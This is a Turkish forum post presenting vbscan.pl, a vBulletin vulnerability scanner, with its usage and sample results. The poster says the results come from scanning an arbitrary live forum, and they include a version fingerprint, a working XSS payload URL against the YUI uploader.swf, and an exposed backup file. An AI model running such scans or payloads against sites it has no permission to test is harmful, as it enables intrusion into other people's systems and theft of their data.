Bağlantıları görmek için lütfen
Giriş Yap
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Konu başlığından da anlaşılacağı gibi vBulletin forum sistemindeki zaafiyetleri tespit edebilmek kullandığımız bir araç.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Kullanım için konu bitiminde linkini vereceğim.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Konsoldaki kullanımı oldukça basit;[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]vbscan.pl [/FONT]
Bağlantıları görmek için lütfen
Giriş Yap
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]şeklinde komutumuzu girdiğimizde vBulletin forumunda OWASP’ın belirlemiş olduğu tüm zaafiyetleri tarıyor.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Ayrıca zaafiyet datası güncel tutulmaktadır ayrıca packetstormsecurity.com ve exploit-db.com üzerinden POC linki vermektedir.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Ben herhangi bir vBulletin forumunu kullanan site üzerinde deneme yaptım ve orda çıkan sonuçları vermek istiyorum.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Ayrıca tarama işlemi bittikten sonra reports klasöründe sonuçları txt biçiminde vermektedir.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Hemen örnek sonuçları inceleyelim; (Sadece sonuç veren kısımları alıyorum)[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][+] Processing [/FONT]
Bağlantıları görmek için lütfen
Giriş Yap
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif] ...[/FONT][font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][+] Detecting vBulletin Version[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][++] vBulletin Version : vBulletin 4.2.2 Patch Level 2[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][+] Checking vBulletin YUI 2.9.0 XSS[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][++] uploader.swf is vulnerable [/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]http://forum.hedefsite.net/vb//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]POC : [/FONT]
Bağlantıları görmek için lütfen
Giriş Yap
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][+] Finding common backup files name[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif][++] Backup file is found [/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Path : [/FONT]
Bağlantıları görmek için lütfen
Giriş Yap
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]vBulletin sürümü, xss zaafiyeti ve yedekleme dosyalarının yerini tespit etmiş.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]vBulletin kullanan hedef siteler için kısa sürede etkili sonuçlar verebilecek bir araç olduğunu düşünüyorum.[/FONT]
[font=tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]Ayrıca vbscan.pl --help komutu ile tüm parametreleri görebilirsiniz..[/FONT]
Bağlantıları görmek için lütfen
Giriş Yap